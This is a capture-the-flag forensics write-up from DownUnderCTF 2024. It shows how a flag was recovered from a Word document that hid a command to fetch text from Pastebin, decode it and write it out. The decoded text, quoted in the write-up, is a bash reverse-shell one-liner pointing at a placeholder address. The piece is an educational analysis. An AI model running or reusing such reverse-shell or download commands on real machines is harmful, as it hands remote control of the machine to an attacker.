MQCyberSec

MQCyberSec Logo

MQCyberSec
Back to Writeups

tldr please summarise

by sealldev
🚩 CTFs DownUnderCTF 2024 forensics
tldr please summarise / DownUnderCTF 2024
tldr please summarise

Description

I thought I was being 1337 by asking AI to help me solve challenges, now I have to reinstall Windows again. Can you help me out by find the flag in this document?

Original Writeup on seall.dev

We are given a EmuWar.docx that is mostly nothing.

emuwardoc

I know that Office documents are just essentially zip archives, so I extract the contents:

$ 7z x EmuWar.docx
Scanning the drive for archives:
1 file, 8202 bytes (9 KiB)

Extracting archive: EmuWar.docx
--
Path = EmuWar.docx
Type = zip
Physical Size = 8202

Everything is Ok

Files: 9
Size:       26291
Compressed: 8202

Inside the word/document.xml I find a suspicious link:

... <w:t xml:space="preserve">; curl -sL https://pastebin.com/raw/ysYcKmbu | base64 -d &gt; </w:t></w:r><w:r><w:rPr> ...

Visiting the Pastebin URL is a base64 string: YmFzaCAtaSA+JiAvZGV2L3RjcC8yNjEuMjYzLjI2My4yNjcvRFVDVEZ7Y2hhdGdwdF9JX24zM2RfMl8zc2NhcDN9IDA+JjE=.

Decoded is the following: bash -i >& /dev/tcp/261.263.263.267/DUCTF{chatgpt_I_n33d_2_3scap3} 0>&1.

Flag: DUCTF{chatgpt_I_n33d_2_3scap3}

Related Writeups

Information

Files can always be changed in a secret way. Can you find the flag? Hint: Look at the details of the file Hint: Make su ...

#easy

Mob psycho

Can you handle APKs?

#medium

Secret of the Polyglot

The Network Operations Center (NOC) of your local institution picked up a suspicious file, they're getting conflicting i ...

#easy

Share this writeup

Contribute

Found an issue or want to improve this writeup?

Edit on GitHub